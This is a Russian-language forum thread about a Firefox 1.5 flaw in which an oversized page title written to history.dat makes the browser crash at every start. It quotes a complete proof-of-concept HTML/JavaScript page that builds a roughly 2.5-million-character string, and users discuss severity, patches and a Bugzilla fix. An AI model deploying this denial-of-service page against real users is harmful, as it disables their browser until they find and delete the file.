Опубликован исходный код (в виде javascript-кода), который использует уязвимость браузера Firefox 1.5. Принцип действия его довольно прост. Как пишет автор, Firefox использует для сохранения всех посещённых URL файл history.dat. Созданный скрипт сохраняет в этом файле очень большой топпик. В результате при следующей загрузке браузера происходит его постоянное зависание из-за переполнения буфера. Для устранения последствий рекомендуется ручное удаления файла history.dat.
Источник:
uinС: Новости компьютерной безопасности
http://www.uinc.ru/news/sn4944.html
Нигде не нашел инфы про это. Иправили или как?
А вот и секлаб проснулся http://www.securitylab.ru/poc/242790.php
Код:
<!-- Firefox 1.5 buffer overflow
Basically firefox logs all kinda of URL data in it's history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into it's history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen everytime until you manually delete the history.dat file -- which
most users won't figure out.
this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifcations.
Tested with Firefox 1.5 on Windows XP SP2.
ZIPLOCK <sickbeatz@gmail.com>
-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>Уязвимость не такая страшная, думаю быстро заткнут.
Уязвимость не такая страшная
1) Что подумают домохозяйки на краши браузера при запуске? Кто им скажет, что нужно удалять какой-то файл? Ведь по легенде создавали его именно для них.
2) На фоне обновлений патчами и быстроты латания дыр "страха" меньше, согласен; но сама дыра... Она даже не страшная, она какая-то дурацкая. Хотя... со всеми бывает.
С этим history.dat и раньше проблемы были.. Наверное, его формат не менялся со времён нетшкафа, так и работает годы без капремонта. 
> Уязвимость не такая страшная
Ну, я бы сказал бы по поводу страшных уязвимостей. Просто все равно очень не приятно. Буду очень признателен, если за каким номером в багзилле эта уязвимость идет.
Уже есть патчи.
Уже есть патчи.
Автообновление?
Нажимал "Прверить наличие обновлений..." — тишина.
а на меня эксплоит не сработал 
)
Да зависание фокса на 3 секунды было но никакого краха приложения не последовало...
У меня Firefox 1.5 RU.
Дайте пожалуйста ссылку на патч.
У меня Firefox 1.5 RU.
Дайте пожалуйста ссылку на патч.
Тут многие автообновление ждут с 1.5 RC2
Ven он ещё в виде исходного кода.
Гентушники уже пофиксили. А я всё патча с RC2 жду. 
У меня Firefox 1.5 RU.
Дайте пожалуйста ссылку на патч.Тут многие автообновление ждут с 1.5 RC2
а вы слезте с канала бета тестирования на release
Brem обновление ещё не вышло
NoScript вроде его блокирует.
cr@nk пишетУ меня Firefox 1.5 RU.
Дайте пожалуйста ссылку на патч.Тут многие автообновление ждут с 1.5 RC2
а вы слезте с канала бета тестирования на release
Так я не про себя 
А про общественность. Я нетерпеливый - скачал полностью 
По поводу уязвимости: несколько личностей (причём здесь под словом личность я подразумеваю исключительно негативную оценку социальных качеств) заранее, задолго до того, как уязвимось приобрела широкую известность, знали о ней. Напомню, что уязвимость касается обработки скрипта и внесения кода в history.dat. Уверен на 100%.
Они дождались-таки выхода финальной версии Firefox 1.5 - и только тогда, когда уже практически все пользователи одновились - опубликовали сведения.
Речь веду не об организациях, которые разместили сведения - наверняка источники другие (хотя нельзя ничего исключать) - речь о том, что исключительно подлые и злонамеренные люди сделали такую нехорошую вещь.
KDA #$%#@#!!! (эт я не про тебя )
Спасибо за ссылочку Как думаете, скоро выйдет обновление (чувствую не долго мне осталось на 1.0.x сидеть (хотя в мандриве должны наверное будут патчик добавить...)
и что делать с этим патчем? как его применить? подскажите плиз
jedy Качаешь исходники, правишь их в соответствии с этим https://bugzilla.mozilla.org/attachment.cgi?id=205381&action=diff , компилируешь .
Не стоит оно труда. ибо
но сама дыра... Она даже не страшная, она какая-то дурацкая.
Я - олень - покликал тут по линкам...
Потом запускаю браузер, а он висит...я понял что дело в этом history, удалил его и все стало ОК.
jedy Качаешь исходники, правишь их в соответствии с этим https://bugzilla.mozilla.org/attachment.cgi?id=205381&action=diff , компилируешь
Не стоит оно труда. ибоно сама дыра... Она даже не страшная, она какая-то дурацкая.
извени,не понял-(,
как мне их скомпилить и как исправить?
jedy Лучше не мучайся, а дождись нормального патча.
несколько личностей (причём здесь под словом личность я подразумеваю исключительно негативную оценку социальных качеств) заранее, задолго до того, как уязвимось приобрела широкую известность, знали о ней. Напомню, что уязвимость касается обработки скрипта и внесения кода в history.dat. Уверен на 100%.
Они дождались-таки выхода финальной версии Firefox 1.5 - и только тогда, когда уже практически все пользователи одновились - опубликовали сведения.
Речь веду не об организациях, которые разместили сведения - наверняка источники другие (хотя нельзя ничего исключать) - речь о том, что исключительно подлые и злонамеренные люди сделали такую нехорошую вещь.
кто посмел поднять руку на Firefox? меня удивляет поведение этих личностей (если, конечно, они не из M$): Firefox просто спокойно развивающийся браузер, кому нужно бросать тень на его разработчиков?.. ужас, короче говоря!..
Когда я говорил про патчи, я имел в виду патчи к багу, не бинарные патчи.
Бинарного патча закрывающего данную уязвимость нет и скорее всего не будет, её опасность определена как низкая.
Что касается этой уязвимости:
Официальные рекомендации Mozilla.org